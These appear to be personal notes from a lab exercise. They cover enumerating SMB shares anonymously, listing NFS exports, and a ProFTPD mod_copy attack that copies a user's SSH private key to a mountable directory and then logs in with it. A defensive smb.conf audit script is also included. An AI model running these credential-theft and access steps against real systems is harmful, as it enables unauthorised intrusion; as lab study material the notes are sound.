SAMBA && RPCBIND & MOUNTING & SMBCLIENT
Enumerating Samba for shares
1> nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.201.87.30
2> SMB has two ports, 445 and 139.

3> enum4linux -a 10.201.87.30
4> smbclient -I 10.201.87.30 -L 10.201.87.30 -N
5> smbclient -L //10.201.87.30 -N
6> smbclient -L 10.201.87.30 -N
7> smbclient -L 10.201.87.30 -U username%password --> if the username and password are known
Accessing a share
print$ (Disk)
This is a special share where printer drivers are stored. It is usually read-only and used for printer installs; it may contain files, but it is not a normal data share.
anonymous (Disk)
This is a real file share, and the name itself suggests that anonymous access is allowed (it showed up when you connected with -N). That means you can access this share without a password. This is the most important one; this is where files can be pulled from.
IPC$ (IPC)
IPC$ is not a file share like a normal folder; it is used for named pipes / inter-process communication (authentication, service communication). It is generally not useful for browsing, but enumeration tools pull information from it.
smbclient //host/share | \\host\share
1> smbclient //10.201.87.30/anonymous -N
2> smbclient //10.201.87.30/anonymous -N -c 'ls'
You can recursively download the SMB share too. Submit an empty username and password.
smbget -R smb://10.201.87.30/anonymous
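As an added defender-side example (not part of these notes), a small Python audit of the server-side smb.conf that flags the shares an `smbclient -L host -N` listing would expose as guest-accessible; the config text is constructed for the example and the weak/hardened pair shows the settings that make the difference.

```python
# Added defender-side example (not from the original notes): the `-N` listing above
# worked because a share is configured `guest ok = yes`; this finds such shares in
# the server-side smb.conf before an external enumeration does.
import configparser
# Constructed sample smb.conf modelling the shares listed above (print$ and anonymous).
WEAK_SMB_CONF = """[global]
   map to guest = Bad User
   restrict anonymous = 0
[print$]
   read only = yes
   guest ok = no
[anonymous]
   read only = no
   guest ok = yes
"""
# Same config with guest access removed and anonymous (null) sessions refused.
HARDENED_SMB_CONF = (WEAK_SMB_CONF
                     .replace("guest ok = yes", "guest ok = no")
                     .replace("map to guest = Bad User", "map to guest = Never")
                     .replace("restrict anonymous = 0", "restrict anonymous = 2"))

def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")

def parse_smb_conf(text):
    # Samba indents keys; strip lines so configparser does not read them as continuations.
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       inline_comment_prefixes=("#", ";"))
    parser.read_string("\n".join(line.strip() for line in text.splitlines()))
    return parser

def guest_accessible_shares(text):
    """Return [(share, writable)] for every share with guest access enabled."""
    findings = []
    conf = parse_smb_conf(text)
    for share in conf.sections():
        if share == "global":
            continue
        # `public` is Samba's documented synonym for `guest ok`.
        guest = conf.get(share, "guest ok", fallback=conf.get(share, "public", fallback="no"))
        if _truthy(guest):
            read_only = conf.get(share, "read only", fallback="yes")
            writable = conf.get(share, "writable", fallback=conf.get(share, "writeable", fallback="no"))
            findings.append((share, _truthy(writable) or not _truthy(read_only)))
    return findings

def null_sessions_allowed(text):
    """True unless `restrict anonymous = 2`, which refuses anonymous IPC$ connections."""
    return parse_smb_conf(text).get("global", "restrict anonymous", fallback="0").strip() != "2"
```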
RPCBIND PORT 111
1>
2> showmount -e 10.201.87.30 --> lists the directories exported for mounting
ProFTPD
1> nc <ip-address> 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa --> copies the id_rsa to /var/tmp on the server (mod_copy)
2> To mount the remote NFS export locally: mkdir /mnt/kenobiNFS
mount 10.201.63.169:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.201.63.169